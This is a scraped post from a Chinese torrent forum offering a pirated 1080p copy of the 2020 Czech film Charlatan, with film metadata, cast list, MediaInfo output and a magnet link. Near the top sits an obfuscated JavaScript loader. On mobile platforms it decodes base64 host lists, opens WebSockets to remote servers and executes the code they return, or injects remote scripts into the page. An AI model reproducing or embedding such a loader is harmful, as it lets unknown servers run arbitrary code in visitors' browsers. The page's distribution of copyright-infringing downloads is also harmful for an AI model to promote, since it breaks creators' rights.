江湖医生[中文字幕].Charlatan.2020.1080p.FriDay.WEB-DL.H264.AAC 3.23GB

版主小s 17天前 111

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 江湖医生 / 我不是医神(港) / 江湖郎中 / Charlatan
◎片  名 ?arlatán
◎年  代 2020
◎产  地 爱尔兰 / 斯洛伐克 / 波兰
◎类  别 剧情 / 同性 / 传记 / 历史
◎语  言 捷克语 / 德语
◎上映日期 2020-02-27(柏林电影节) / 2020-08-20(捷克)
◎IMDb链接 https://www.imdb.com/title/tt6028620/
◎豆瓣评分 7.5/10 (1442人评价)
◎豆瓣链接 https://movie.douban.com/subject/26998133/
◎片  长 118分钟
◎导  演 阿格涅丝卡·霍兰 Agnieszka Holland (id:1036838)
◎编  剧 马瑞克·艾普斯坦 Marek Epstein (id:1304753)
◎演  员 伊凡·特洛伊 Ivan Trojan (id:1011034)
       约瑟夫·特洛伊 Josef Trojan (id:1450561)
       尤拉伊·娄伊 Juraj Loj (id:1432773)
       嘉罗斯拉娃·波科娜 Jaroslava Pokorná (id:1294654)
       马丁·西塔 Martin Sitta (id:1157437)
       扬·弗拉萨克 Jan Vlasák (id:1005360)
       芭芭拉·米洛托娃 Barbora Milotová (id:1438754)
       玛格达莱娜·博洛娃 Magdaléna Borová (id:1171524)
       奥特马尔·布兰库斯基 Otmar Brancuzsky (id:1068959)
       扬·布达尔 Jan Buda? (id:1023513)
       马丁·马斯卡 Martin Mysicka (id:1034333)
       伊娃·班多尔 éva Bandor (id:1349099)
       伊戈尔·巴雷斯 Igor Bares (id:1190300)
       马瑞克·艾普斯坦 Marek Epstein (id:1304753)
       约阿希姆·保罗·阿斯波克 Joachim Paul Assb?ck (id:1057617)
       伯恩哈德·舒茨 Bernhard Schütz (id:1338692)
       克劳迪娅·瓦西科娃 Claudia Vasekova (id:1169754)
       扬·诺沃特尼 Jan Novotny (id:1128335)
       瓦茨拉夫·科普塔 Václav Kopta (id:1210017)
       吉里·伦德尔 Jirí Rendl (id:1438741)
       卡米尔·斯韦吉达 Kamil Svejda (id:1208821)

◎标  签 同性 / 捷克 / 传记 / 真实事件改编 / 2020 / LGBT / 剧情 / 捷克电影

◎简  介
  阿格涅丝卡·霍兰([糜骨之壤])新片[江湖郎中](Charlatan,暂译)正式开拍,该片由伊凡·特洛伊(Ivan Trojan)、尤拉伊·娄伊(Juraj Loj)主演。影片故事根据草药医生Jan Mikolá?ek的真实故事改编,讲述尽管困难重重 ,他还是毕生致力于照料病人。该片计划于明年2月20日首映。

◎获奖情况 (共2项)
  第70届柏林国际电影节 (2020)
  泰迪熊奖(提名)
   └──阿格涅丝卡·霍兰 (id:1036838)

  第33届欧洲电影奖 (2020)
  最佳导演(提名)
   └──阿格涅丝卡·霍兰 (id:1036838)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 43303001245857690416599583891754066860 (0x2093DACC2F7D15BD29EB91DBBFCC23AC)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 3.23 GiB
  8. Duration                                 : 1 h 57 min
  9. Overall bit rate                         : 3 917 kb/s
  10. Encoded date                             : UTC 2021-10-02 23:55:09
  11. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : AVC
  16. Format/Info                              : Advanced Video Codec
  17. Format profile                           : [email protected]
  18. Format settings                          : CABAC / 1 Ref Frames
  19. Format settings, CABAC                   : Yes
  20. Format settings, Reference frames        : 1 frame
  21. Format settings, GOP                     : M=1, N=60
  22. Codec ID                                 : V_MPEG4/ISO/AVC
  23. Duration                                 : 1 h 57 min
  24. Bit rate mode                            : Constant
  25. Bit rate                                 : 3 789 kb/s
  26. Nominal bit rate                         : 4 000 kb/s
  27. Width                                    : 1 920 pixels
  28. Height                                   : 1 080 pixels
  29. Display aspect ratio                     : 16:9
  30. Frame rate mode                          : Constant
  31. Frame rate                               : 29.970 (30000/1001/53354) FPS
  32. Color space                              : YUV
  33. Chroma subsampling                       : 4:2:0
  34. Bit depth                                : 8 bits
  35. Scan type                                : Progressive
  36. Bits/(Pixel*Frame)                       : 0.061
  37. Stream size                              : 3.12 GiB (97%)
  38. Default                                  : Yes
  39. Forced                                   : No
  40. Audio
  41. ID                                       : 2
  42. Format                                   : AAC LC
  43. Format/Info                              : Advanced Audio Codec Low Complexity
  44. Codec ID                                 : A_AAC-2
  45. Duration                                 : 1 h 57 min
  46. Bit rate                                 : 125 kb/s
  47. Channel(s)                               : 2 channels
  48. Channel layout                           : L R
  49. Sampling rate                            : 48.0 kHz
  50. Frame rate                               : 46.875 FPS (1024 SPF)
  51. Compression mode                         : Lossy
  52. Stream size                              : 106 MiB (3%)
  53. Language                                 : Czech
  54. Default                                  : Yes
  55. Forced                                   : No
  56. Text #1
  57. ID                                       : 3
  58. Format                                   : UTF-8
  59. Codec ID                                 : S_TEXT/UTF8
  60. Codec ID/Info                            : UTF-8 Plain Text
  61. Duration                                 : 1 h 56 min
  62. Bit rate                                 : 30 b/s
  63. Count of elements                        : 962
  64. Stream size                              : 25.7 KiB (0%)
  65. Title                                    : Chinese Simplified
  66. Language                                 : Chinese
  67. Default                                  : Yes
  68. Forced                                   : No
  69. Text #2
  70. ID                                       : 4
  71. Format                                   : UTF-8
  72. Codec ID                                 : S_TEXT/UTF8
  73. Codec ID/Info                            : UTF-8 Plain Text
  74. Duration                                 : 1 h 56 min
  75. Bit rate                                 : 30 b/s
  76. Count of elements                        : 962
  77. Stream size                              : 25.7 KiB (0%)
  78. Title                                    : Chinese Traditional
  79. Language                                 : Chinese
  80. Default                                  : No
  81. Forced                                   : No
复制代码




TAGS 剧情 同性 历史 传记

磁力链:
  • magnet:?xt=urn:btih:4B4D0F07FF91CECB14B78ADCD2FF9C44D3227E1A
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回